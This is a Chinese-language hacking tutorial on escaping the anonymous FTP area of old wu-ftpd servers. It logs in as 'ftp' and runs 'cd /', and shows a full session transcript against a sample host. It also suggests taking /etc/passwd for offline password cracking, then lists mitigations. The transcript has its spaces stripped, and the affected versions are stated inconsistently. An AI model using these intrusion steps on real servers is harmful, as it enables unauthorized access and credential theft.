正文

利用伺服程式的缺陷入侵系统

  FTP入侵：wu-ftpd2.x版以前安全缺陷。
  wu-ftpd2.x是WashingtonUniversity（美国华盛顿大学）所研发出来的FTP伺服程式，广泛应用在各型UNIX主机上作为FTP伺服程式。它可以接受一般的用户签入，也提供以Anonymous或ftp为名的匿名签入以开放主机上的档案供大众Download用。其2.2版本以前有一个很严重的安全缺陷：一个匿名的使用者经由下列程序也可以取得一般使用者的权限进入系统磁碟：
  1.以任何一个FTPClient端程式连线到使用wu-ftpd2.x版以前架设的FTP站台。
  2.要求签入时，使用匿名帐号签入，但不要使用anonymous而使用FTP。
  3.在根目录下再次使用chdi/（cd/）命令，即可切换到一般系统目录而不只是公众目录。现在在此示范如何入侵网络上的一台please.hack.me主机，实例如下：（中文部分为注解）
  linux1:~#ftpplease.hack.me
  Connectedtoplease.hack.me
  220hackFTPserver(Versionwu-2.x(x)SunMay14:57:12CDT1993)ready.
  Name(linux1.twunix.org:root):ftp
  331Guestloginok,sendyourcompleteemailaddressaspassword.
  Password:
  230-Welcome,archiveuser!ThisisanexperimentalFTPserver.Ifhaveany
  230-unusualproblems,pleasereporthemviaemailtoroot@please
  230-Ifyoudohaveproblems,pleasetryusingadash(-)asthefirstcharacter
  230-ofyourpassword-thiswillturnoffthecontinuationmessagesthatmay
  230-beconfusingyourftpclient.
  230-
  230Guestloginok,accessrestrictionsapply.
  RemotesystemtypeisUNIX.
  Usingbinarymodetotransferfiles.
  ftp>ls-1一般匿名帐号进入后，先查看所在目录的内容。
  200PORTcommandsuccessful.
  150OpeningASCIImodedataconnectionfor/bin/ls.
  tota19
  drwxrwxr-x8rootwheel1024Sep1109:31.
  drwxrwxr-x8rootwheel1024Sep1109:31..
  drwxrwxr-x2rootwheel1024Sep1109:31bin
  drwxrwxr-x2rootwheel1024Sep1109:31etc
  drwxrwxr-x2rootwheel1024Dec31993incoming
  drwxrwxr-x2rootwheel1024Nov171993lib
  drwxrwxr-x2rootwheel1024Sep1109:31pub
  drwxrwxr-x3rootwheel1024Sep1109:31usr
  -rw-r–r–1rootroot312Aug11994welcome.msg
  226Transfercomplete.以一般匿名帐号进入后只能看到公众目录内容。
  ftp>pwd
  257"/"iscurrentdirectory.
  ftp>cd/虽然已经在根目录下，依然再次切换到/目录。
  250CWDcommandsuccessful.本来应该是要回应[无此目录]的（因为已经在最底层）但是依然可以继续切换。
  ftp>ls-1再次查验现在目录内容。
  200PORTcommandsuccessful.
  150OpeningASCIImodedataconnectionfor/bin/ls.
  total777
  drwxr-xr-x19rootroot1024ct608:58.
  drwxr-xr-x19rootroot1024ct608:58..
  drwxr-xr-x2rootbin2048Sep1117:31bin
  drwxr-xr-x2rootroot1024Sep1117:35boot
  drwxr-xr-x3rootroot2048Oct1400:03dev
  drwxr-xr-x9rootroot2048Oct1410:41etc
  drwxr-xr-x3rootroot1024Oct507:26ext
  drwxr-xr-x2rootroot1024Sep1109:42floppy
  drwxr-xr-x8rootroot1024Oct1111:52home
  drwxr-xr-x3rootroot1024Sep1117:27lib
  drwxr-xr-x2rootroot12288Sep1117:16lost+found
  drwxr-xr-x2rootroot1024Jul1013:23mnt
  dr-xr-xr-x5rootroot1408Oct408:03proc
  -rw——-1rootroot139424Sep2817:00quota.user
  drwxr-x-x3rootroot1024Sep2814:07root
  drwxr-xr-x2rootbin2048Sep1117:31sbin
  drwxr-xr-x2rootroot1024Sep1117:18shlib
  drwxrwxrwt3rootroot1024Oct1410:40tmp
  drwxr-xr-x24rootroot1024Jul81994usr
  drwxr-xr-x14rootroot1024Sep1117:32var
  -r———1rootroot596263Sep1117:33vmlinuz
  226Transfercomplete.已经变成一般系统目录了。
  ftp>
 
入侵原理解说：
  此一入侵是利用FTP公众匿名帐号anonymous，ftp其中后者的ftp正好与系统内定的FTP公众帐号名称相同，使得系统误以为ftp是一个已经登记的用户，而不是一个公众匿名帐号，而使其进入系统目录中。
  为什么会有这种现象发生呢？原来是FTP伺服程式将连线进来是使用者分为[匿名帐号]与[正式帐号]。如果是匿名帐号，则系统仅要求其输入自己的E-mail或是Ident资料当密码，就可以进入系统的/home/ftp目录中，而以/home/ftp当作此类使用者的根目录，这种用anonymous或是ftp当帐号匿名签入的使用者是没有办法切到系统目录中的（实际的/目录），再怎么下chdir/命令也只能到/home/ftp为止。
  而如果在/etc/password中登记有案的帐号，则以系统中实际的/为其根目录，此类使用者可以在其权限范围内浏览整个硬碟。
  而因为匿名帐号是以/home/ftp目录为起点，正好与ftp此一匿名帐号相同，故wu-ftpd2.x版以前的版本将会使用ftp签入的帐号视为一般User。（不过如果是用anonymous此一匿名帐号签入，就不会有这种情况了）
  使用ftp帐号并入侵到系统里面以后有什么好处呢？由于该入侵者已经可以完整浏览该硬碟，并享有一般User的权限，当然入侵者也可以进到/etc目录下，并读取passwd档案。如果该系统没有做shadow的话，那就大大方方地拿走passwd档案，然后回家利用类密码分析程式算出密码来。如果正好还破出root的密码的话，那就……嘿嘿~~~~
 
入侵防治方法：

  1.如果您的ftp伺服程式是wu-ftpd而且版本号低于2.4版，请尽快换到2.4版使用。
  2.将ftp帐号列入/ftp/ftpusers档案中，让匿名使用者只能利用anonymous此一匿名帐号签入。
  3.替系统安装ShadowPasswd。
  4.再次确认系统中没有叫做ftp或是anonymous的目录。
  5.改/etc/inetd.conf档案，关闭FTP服务。